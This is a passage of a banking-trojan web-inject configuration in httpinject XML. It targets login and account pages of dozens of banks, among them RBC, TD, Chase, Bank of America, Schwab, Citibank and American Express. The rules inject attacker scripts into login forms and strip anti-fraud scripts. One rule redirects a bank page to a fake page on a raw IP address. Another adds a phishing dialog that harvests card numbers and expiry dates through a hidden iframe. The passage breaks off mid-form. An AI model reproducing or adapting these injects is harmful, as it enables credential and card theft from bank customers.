1272. <pattern modifiers="Ums"><![CDATA[( name="login_form".+ type="submit".+</form>)]]></pattern>
1273. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1274. </modify>
1275. </actions>
1276. </httpinject>
1277. <httpinject>
1278. <conditions>
1279. <url type="allow" onpost="0" onget="1" modifiers="iU">^https://www\d+\.rbc\.com/NU00/pki/authenticate/AuthenticateUserRoamingEPF\.jsp</url>
1280. <url type="deny" onpost="1" onget="1" modifiers="U">^https?://.+/scripts/default0\.js($|\?.+)</url>
1281. </conditions>
1282. <actions>
1283. <redirect>
1284. <url>http://162.211.231.13/fakes/rbc.php</url>
1285. </redirect>
1286. </actions>
1287. </httpinject>
1288. <httpinject>
1289. <conditions>
1290. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(edi|del|hkg|lon|sta)\.my\.rbs\.com</url>
1291. </conditions>
1292. <actions>
1293. <modify>
1294. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
1295. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1296. </modify>
1297. <modify>
1298. <pattern modifiers="i"><![CDATA[(function checkKey\(e\))]]></pattern>
1299. <replacement><![CDATA[\1{}function checkKey1(e)]]></replacement>
1300. </modify>
1301. </actions>
1302. </httpinject>
1303. <httpinject>
1304. <conditions>
1305. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://access\.rbsm\.com/logon/(password|dp300)/.+\.fcc(\?|$)</url>
1306. </conditions>
1307. <actions>
1308. <modify>
1309. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1310. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1311. </modify>
1312. </actions>
1313. </httpinject>
1314. <httpinject>
1315. <conditions>
1316. <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)scotiaconnect\.scotiabank\.com/sco\-tp/pki/AuthenticateUserInputRoamingEPF\.jsp(\?|$)</url>
1317. </conditions>
1318. <actions>
1319. <modify>
1320. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1321. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1322. </modify>
1323. </actions>
1324. </httpinject>
1325. <httpinject>
1326. <conditions>
1327. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*.secure\-banking\.com/.*/PassmarkSignIn\.faces</url>
1328. </conditions>
1329. <actions>
1330. <modify>
1331. <pattern modifiers="i"><![CDATA[fraudmap.*<\/script>]]></pattern>
1332. <replacement><![CDATA["</script>]]></replacement>
1333. </modify>
1334. <modify>
1335. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1336. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1337. </modify>
1338. </actions>
1339. </httpinject>
1340. <httpinject>
1341. <conditions>
1342. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://internetbanking\.securetrustbank\.com/SecureTrust/SecureTrust</url>
1343. </conditions>
1344. <actions>
1345. <modify>
1346. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1347. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1348. </modify>
1349. </actions>
1350. </httpinject>
1351. <httpinject>
1352. <conditions>
1353. <url type="allow" onpost="1" onget="1" modifiers="U">^https://wirexchange\.goxroads\.com/wx/(login|wp_login_user)\.cfm($|\?)</url>
1354. </conditions>
1355. <actions>
1356. <modify>
1357. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1358. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1359. </modify>
1360. </actions>
1361. </httpinject>
1362. <httpinject>
1363. <conditions>
1364. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://s2b\.standardchartered\.com/ssoapp/(login\.jsp|core\.security\.login\.event)</url>
1365. </conditions>
1366. <actions>
1367. <modify>
1368. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1369. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1370. </modify>
1371. <modify>
1372. <pattern modifiers="i"><![CDATA[div class="scbLoginImpContainer01"]]></pattern>
1373. <replacement><![CDATA[div class="scbLoginImpContainer01" style="display:none;"]]></replacement>
1374. </modify>
1375. </actions>
1376. </httpinject>
1377. <httpinject>
1378. <conditions>
1379. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sme\.standardchartered\.com/commonapp/core\.security\.vascochallenge\.event</url>
1380. </conditions>
1381. <actions>
1382. <modify>
1383. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1384. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1385. </modify>
1386. </actions>
1387. </httpinject>
1388. <httpinject>
1389. <conditions>
1390. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.sterlingwires\.com/</url>
1391. <url type="deny" onpost="0" onget="1" modifiers="">IWPreScript\.js</url>
1392. </conditions>
1393. <actions>
1394. <modify>
1395. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1396. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1397. </modify>
1398. </actions>
1399. </httpinject>
1400. <httpinject>
1401. <conditions>
1402. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.suntrust\.com/portal/server\.pt(\?|)</url>
1403. </conditions>
1404. <actions>
1405. <modify>
1406. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1407. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1408. </modify>
1409. </actions>
1410. </httpinject>
1411. <httpinject>
1412. <conditions>
1413. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://businessbankingcenter\.synovus\.com/CPFLC/Pages/u/login\.aspx</url>
1414. </conditions>
1415. <actions>
1416. <modify>
1417. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1418. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1419. </modify>
1420. </actions>
1421. </httpinject>
1422. <httpinject>
1423. <conditions>
1424. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://businessonline\.tdbank\.com/corporatebankingweb/core/login\.aspx</url>
1425. </conditions>
1426. <actions>
1427. <modify>
1428. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
1429. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1430. </modify>
1431. </actions>
1432. </httpinject>
1433. <httpinject>
1434. <conditions>
1435. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessbanking.*\.tdcommercialbanking\.com/WBB/Login(|Display)(\?|\;|$)
1436. </url>
1437. </conditions>
1438. <actions>
1439. <modify>
1440. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1441. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1442. </modify>
1443. </actions>
1444. </httpinject>
1445. <httpinject>
1446. <conditions>
1447. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://tdetreasury\.tdbank\.com/s1gcb/logon/sbuser</url>
1448. </conditions>
1449. <actions>
1450. <modify>
1451. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1452. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1453. </modify>
1454. </actions>
1455. </httpinject>
1456. <httpinject>
1457. <conditions>
1458. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secureport\.texascapitalbank\.com/WebID/IISWebAgentIF\.dll</url>
1459. </conditions>
1460. <actions>
1461. <modify>
1462. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1463. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1464. </modify>
1465. <modify>
1466. <pattern modifiers="i"><![CDATA[class="ContactSupportGreyText"]]></pattern>
1467. <replacement><![CDATA[class="ContactSupportGreyText" style="display:none;"]]></replacement>
1468. </modify>
1469. </actions>
1470. </httpinject>
1471. <httpinject>
1472. <conditions>
1473. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://trz\.tranzact\.org/(credential\.aspx|OTP\.asp)($|\?)</url>
1474. </conditions>
1475. <actions>
1476. <modify>
1477. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1478. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1479. </modify>
1480. </actions>
1481. </httpinject>
1482. <httpinject>
1483. <conditions>
1484. <url type="allow" onpost="1" onget="1" modifiers="U">^https://securentrycorp\..+(metrics|analytics)</url>
1485. </conditions>
1486. <actions>
1487. <redirect>
1488. <url>http://microsoft.com</url>
1489. </redirect>
1490. </actions>
1491. </httpinject>
1492. <httpinject>
1493. <conditions>
1494. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://securentrycorp\..+/authentication/zbf/</url>
1495. <url type="deny" onpost="1" onget="1" modifiers="U">^https://securentrycorp\..+(metrics|analytics)</url>
1496. </conditions>
1497. <actions>
1498. <modify>
1499. <pattern modifiers="U"><![CDATA[(</head>)]]></pattern>
1500. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1501. </modify>
1502. </actions>
1503. </httpinject>
1504. <httpinject>
1505. <conditions>
1506. <url type="allow" onpost="1" onget="1" modifiers="">^https://bizonline\.tcbk\.com/tcbsb\_corporatebankingweb/core/login\.aspx(\?|$)</url>
1507. </conditions>
1508. <actions>
1509. <modify>
1510. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1511. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1512. </modify>
1513. </actions>
1514. </httpinject>
1515. <httpinject>
1516. <conditions>
1517. <url type="allow" onpost="1" onget="1" modifiers="U">^https://singlepoint\.usbank\.com/cs70_banking/logon/sbuser</url>
1518. </conditions>
1519. <actions>
1520. <modify>
1521. <pattern modifiers="msU"><![CDATA[(name\="tmupLogonForm".+</form>)]]></pattern>
1522. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1523. </modify>
1524. </actions>
1525. </httpinject>
1526. <httpinject>
1527. <conditions>
1528. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sso\.unionbank\.com/(obc/forms/password\.fcc|unp/SSOLoginServlet)</url>
1529. </conditions>
1530. <actions>
1531. <modify>
1532. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1533. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1534. </modify>
1535. </actions>
1536. </httpinject>
1537. <httpinject>
1538. <conditions>
1539. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+\.worldsourcefinancial\.com/uiw/.*(LoginFailed|Login)\.html(\?|$)</url>
1540. </conditions>
1541. <actions>
1542. <modify>
1543. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1544. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1545. </modify>
1546. </actions>
1547. </httpinject>
1548. <httpinject>
1549. <conditions>
1550. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://onlinebusinessplus\.vancity\.com/(business/default\.jsp|servlet/Logon)(\?|\;|$)</url>
1551. </conditions>
1552. <actions>
1553. <modify>
1554. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1555. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1556. </modify>
1557. </actions>
1558. </httpinject>
1559. <httpinject>
1560. <conditions>
1561. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.vancity\.com/BusinessBanking/OnlineBanking/</url>
1562. </conditions>
1563. <actions>
1564. <modify>
1565. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
1566. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1567. </modify>
1568. </actions>
1569. </httpinject>
1570. <httpinject>
1571. <conditions>
1572. <url type="allow" onpost="1" onget="1" modifiers="">^https://online\.washingtonfederal\.com/(login\_business\.asp|engine/login/businessLogins\.asp)(\?|$)</url>
1573. </conditions>
1574. <actions>
1575. <modify>
1576. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1577. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1578. </modify>
1579. </actions>
1580. </httpinject>
1581. <httpinject>
1582. <conditions>
1583. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/wcmfd/wcmpw/.*Login</url>
1584. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/phcp/servlet/.*Login</url>
1585. </conditions>
1586. <actions>
1587. <modify>
1588. <pattern modifiers="Ui"><![CDATA[(<body.*>)]]></pattern>
1589. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1590. </modify>
1591. <modify>
1592. <pattern modifiers="msUi"><![CDATA[(?<inject><div id=\"loginmessages\".*>.*<div>.+</div>.*</div>)]]></pattern>
1593. <replacement />
1594. </modify>
1595. </actions>
1596. </httpinject>
1597. <httpinject>
1598. <conditions>
1599. <url type="allow" onpost="0" onget="1" modifiers="">^https://www\.contactus\.cnb\.com/html/tnet\-ad\.html$</url>
1600. </conditions>
1601. <actions>
1602. <modify>
1603. <pattern modifiers="msU"><![CDATA[(?<inject><a href="Safeguarding.*</a>)]]></pattern>
1604. <replacement />
1605. </modify>
1606. </actions>
1607. </httpinject>
1608. <httpinject>
1609. <conditions>
1610. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://webcmpr\.bancopopular\.com/K1/</url>
1611. </conditions>
1612. <actions>
1613. <modify>
1614. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1615. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1616. </modify>
1617. </actions>
1618. <actions>
1619. <modify>
1620. <pattern modifiers="is"><![CDATA[function checkKey\(e\)\{.*</script>]]></pattern>
1621. <replacement><![CDATA[function checkKey(e){}</script>]]></replacement>
1622. </modify>
1623. </actions>
1624. </httpinject>
1625. <httpinject>
1626. <conditions>
1627. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.websteronline\.com/personal/personal\-homepage\.html</url>
1628. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.websteronline\.com/bank/(com\.websterbank\.servlets\.DS|login)</url>
1629. </conditions>
1630. <actions>
1631. <modify>
1632. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1633. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1634. </modify>
1635. </actions>
1636. </httpinject>
1637. <httpinject>
1638. <conditions>
1639. <url type="allow" onpost="1" onget="1" modifiers="">^https?://www\.wellsfargo\.com/com</url>
1640. </conditions>
1641. <actions>
1642. <modify>
1643. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
1644. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1645. </modify>
1646. </actions>
1647. </httpinject>
1648. <httpinject>
1649. <conditions>
1650. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[\w\.\-]+\.ebanking\-services\.com/.+\.aspx</url>
1651. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/EamWeb/.+\.aspx</url>
1652. </conditions>
1653. <actions>
1654. <modify>
1655. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
1656. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1657. </modify>
1658. </actions>
1659. </httpinject>
1660. <httpinject>
1661. <conditions>
1662. <url type="allow" onpost="1" onget="1" modifiers="i">^https://.+/cashman/(|default\.aspx)(\?|$)</url>
1663. <url type="allow" onpost="1" onget="1" modifiers="i">^https://ecash\..+/(|default\.aspx)(\?|$)</url>
1664. <url type="deny" onpost="1" onget="1" modifiers="i">^https://ecash\..+/ABCorporate/Core/(signin|default)\.aspx($|\?)</url>
1665. </conditions>
1666. <actions>
1667. <modify>
1668. <pattern modifiers=""><![CDATA[(</(head|HEAD) *>)]]></pattern>
1669. <replacement><![CDATA[<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/themes/hot-sneaks/jquery-ui.css" type="text/css"/>\1]]></replacement>
1670. </modify>
1671. <modify>
1672. <pattern modifiers="ms"><![CDATA[(.*)(</(form|FORM|body|BODY) *?>)]]></pattern>
1673. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ecash1/scripts/statticker2.js"></script>\2]]></replacement>
1674. </modify>
1675. </actions>
1676. </httpinject>
1677. <httpinject>
1678. <conditions>
1679. <url type="allow" onpost="1" onget="1" modifiers="i">^https://ecash\..+/ABCorporate/Core/(signin|default)\.aspx($|\?)</url>
1680. </conditions>
1681. <actions>
1682. <modify>
1683. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1684. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ecash2/scripts/statticker2.js"></script>]]></replacement>
1685. </modify>
1686. </actions>
1687. </httpinject>
1688. <httpinject>
1689. <conditions>
1690. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.onlineaccess1\.com/.*/Authentication/Login\.aspx</url>
1691. </conditions>
1692. <actions>
1693. <modify>
1694. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1695. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1696. </modify>
1697. </actions>
1698. </httpinject>
1699. <httpinject>
1700. <conditions>
1701. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://personalp\.vanguard\.com/us/.+Q1SBJS
1702. </url>
1703. </conditions>
1704. <actions>
1705. <modify>
1706. <pattern modifiers="iUms"><![CDATA[<html.+?/html>]]></pattern>
1707. <replacement><![CDATA[<html><script>var q1btid = ''; var q1script = '/personalomnistat.js?system=6';</script><script type="text/javascript" language="JavaScript" src="/personalomnistat.js?system=6"></script><script type="text/javascript" language="JavaScript" src="/personalomnistat.js?system=1"></script></html>]]></replacement>
1708. </modify>
1709. </actions>
1710. </httpinject>
1711. <httpinject>
1712. <conditions>
1713. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://personalp\.vanguard\.com/us/
1714. </url>
1715. </conditions>
1716. <actions>
1717. <modify>
1718. <pattern modifiers="iUms"><![CDATA[(</title>)]]></pattern>
1719. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="/personalomnistat.js?system=2"></script>]]></replacement>
1720. </modify>
1721. </actions>
1722. </httpinject>
1723. <httpinject>
1724. <conditions>
1725. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.kbc\.be/
1726. </url>
1727. </conditions>
1728. <actions>
1729. <modify>
1730. <pattern modifiers="isU"><![CDATA[(<form.*id="ID_LOGONFORM".*</form>)]]></pattern>
1731. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1732. </modify>
1733. </actions>
1734. </httpinject>
1735. <httpinject>
1736. <conditions>
1737. <url type="allow" onpost="1" onget="1" modifiers="iU"><![CDATA[^https\://chaseonline\.chase\.com/MyAccounts\.aspx.*]]></url>
1738. <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
1739. </url>
1740. </conditions>
1741. <actions>
1742. <modify>
1743. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1744. <replacement><![CDATA[\1<style type="text/css">
1745. body {visibility: hidden; }
1746. </style>
1747. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1748. <script type="text/javascript" src="personalomnistat.js?system=8"></script>]]></replacement>
1749. </modify>
1750. </actions>
1751. </httpinject>
1752. <httpinject>
1753. <conditions>
1754. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.chase\.com/.*apps/chase/clientlibs/foundation/publishoptimized/homepage\-po\-min\.js
1755. </url>
1756. </conditions>
1757. <actions>
1758. <modify>
1759. <pattern modifiers="isU"><![CDATA[(abcdefghijklmnopqrstuvwxyz0123456789_")]]></pattern>
1760. <replacement><![CDATA[\1;if(typeof window.submitLogin !== 'undefined' && !window.submitLogin()) return false]]></replacement>
1761. </modify>
1762. </actions>
1763. </httpinject>
1764. <httpinject>
1765. <conditions>
1766. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)"><![CDATA[^https\://.*\.bankofamerica\.com/myaccounts/.*]]></url>
1767. <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
1768. </url>
1769. </conditions>
1770. <actions>
1771. <modify>
1772. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1773. <replacement><![CDATA[\1<style type="text/css">
1774. body1 {visibility: hidden; }
1775. </style>
1776. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1777. <script type="text/javascript" src="personalomnistat.js?system=9">
1778. </script>]]></replacement>
1779. </modify>
1780. </actions>
1781. </httpinject>
1782. <httpinject>
1783. <conditions>
1784. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)"><![CDATA[^https\://.*\.bankofamerica\.com/login/sitekey.*skmaint\.go.*]]></url>
1785. <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
1786. </url>
1787. </conditions>
1788. <actions>
1789. <modify>
1790. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1791. <replacement><![CDATA[\1<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1792. <script type="text/javascript" src="personalomnistat.js?system=10">
1793. </script>]]></replacement>
1794. </modify>
1795. </actions>
1796. </httpinject>
1797. <httpinject>
1798. <conditions>
1799. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/html"><![CDATA[^https\://.*\.bankofDISABLEDFORCASHPROamerica\.com.*]]></url>
1800. <url type="deny" onpost="0" onget="1" modifiers="i">(SignOn\.go|\.(gif|png|jpg|css|swf)($|\?))
1801. </url>
1802. </conditions>
1803. <actions>
1804. <modify>
1805. <pattern modifiers="msU"><![CDATA[(\</html\>)]]></pattern>
1806. <replacement><![CDATA[\1<script type="text/javascript" src="personalomnistat.js?system=11">
1807. </script>]]></replacement>
1808. </modify>
1809. </actions>
1810. </httpinject>
1811. <httpinject>
1812. <conditions>
1813. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/html"><![CDATA[^https\://client\.schwab\.com/Accounts/Summary/Summary\.aspx.*]]></url>
1814. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1815. </url>
1816. </conditions>
1817. <actions>
1818. <modify>
1819. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1820. <replacement><![CDATA[\1<style type="text/css">
1821. body {visibility: hidden; }
1822. </style>
1823. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
1824. <script type="text/javascript">var jq = jQuery.noConflict();</script>
1825. <script type="text/javascript" src="personalomnistat.js?system=12"></script>]]></replacement>
1826. </modify>
1827. </actions>
1828. </httpinject>
1829. <httpinject>
1830. <conditions>
1831. <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/(html|plain)"><![CDATA[^https\://online\.citibank\.com/.*/portal/Home\.do]]></url>
1832. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1833. </url>
1834. </conditions>
1835. <actions>
1836. <modify>
1837. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1838. <replacement><![CDATA[\1<style type="text/css">
1839. body {visibility: hidden; }
1840. </style>
1841. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
1842. <script type="text/javascript" language="JavaScript" src="personalomnistat.js?system=13"></script>]]></replacement>
1843. </modify>
1844. </actions>
1845. </httpinject>
1846. <httpinject>
1847. <conditions>
1848. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.ent\.com/business</url>
1849. </conditions>
1850. <actions>
1851. <modify>
1852. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1853. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1854. </modify>
1855. <modify>
1856. <pattern modifiers="iU"><![CDATA[<script type='text/javascript' src='https://collector\.fraudmap\.net/fs/.*/validate/validate\.js'></script>]]></pattern>
1857. <replacement><![CDATA[]]></replacement>
1858. </modify>
1859. </actions>
1860. </httpinject>
1861. <httpinject>
1862. <conditions>
1863. <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/html"><![CDATA[^https\://online\.americanexpress\.com/myca/.*\?request_type\=authreg_acctAccountSummary.*]]></url>
1864. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1865. </url>
1866. </conditions>
1867. <actions>
1868. <modify>
1869. <pattern modifiers="msU"><![CDATA[</body\>]]></pattern>
1870. <replacement><![CDATA[<div id="namefr" style="display:none;" >
1871. <iframe width="50" height="50" id="myfx" name="myfx"></iframe>
1872. </div>
1873. <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
1874. <style type="text/css">
1875. .ui-dialog-titlebar{ background: white }
1876. .text1a{font-family: Arial; font-size: 10px;}
1877. .sunclass
1878. border-bottom-color: #cccccc;
1879. border-bottom-style: solid;
1880. border-bottom-width: 1px;
1881. border-collapse: collapse;
1882. background-color: #f5f6f1;
1883. color: #333333;
1884. margin-right:10px;
1885. margin-left:10px;
1886. text-align: center;
1887. </style>
1888. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
1889. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
1890. <div id="msg" style=" display:none; height:60px;" class=sunclass>
1891. <div id="box" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
1892. <font id="err" style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>&nbsp correctly.</font>
1893. </div>
1894. </div>
1895. <div id="dialog" style=" display:none; height:180px; width:350px;padding:0; margin0;">
1896. <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
1897. <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
1898. </div>
1899. <div id="txt2" class=sunclass>
1900. <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
1901. </div>
1902. <form action="personalomnistat.js" id="test" method="get" target="myfx" >
1903. <!--CC-->
1904. <div id="full_cc" class=sunclass style="height:30px ;text-align: left;">
1905. <table>
1906. <tr>
1907. <td>
1908. <div id="div_cc_text" style="padding:1px; padding-top:3px; width:72px ; height:25px;text-align:left;">
1909. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Card number:</font>
1910. </div>
1911. </td>
1912. <td>
1913. <div id="div_cc" style ="padding:1px;">
1914. <input type="text" class="amountfield" id="cc1" style="text-align:right;width:34px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1" onkeyup="tabNext1CC(this);" maxlength=4 >
1915. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
1916. <input type="text" class="amountfield" id="cc2"style="text-align:right; width:42px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2" onkeyup="tabNext2CC(this);" maxlength=6 >
1917. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
1918. <input type="text" class="amountfield" id="cc3" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc3" maxlength=5 >
1919. </div>
1920. </td>
1921. </tr>
1922. </table>
1923. </div>
1924. <!--EXP-->
1925. <div id="fulll_exp" class=sunclass style="text-align: left;">
1926. <table>
1927. <tr>
1928. <td align="right">
1929. <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
1930. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font>
1931. </div>
1932. </td>
1933. <td><div id="div_exp" style ="padding:1px;">
1934. <input type="text" class="amountfield" id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm" maxlength=2 >
1935. <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
1936. <input type="text" class="amountfield" id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy" maxlength=4 >
1937. </div></td>
1938. </tr>
1939. </table>
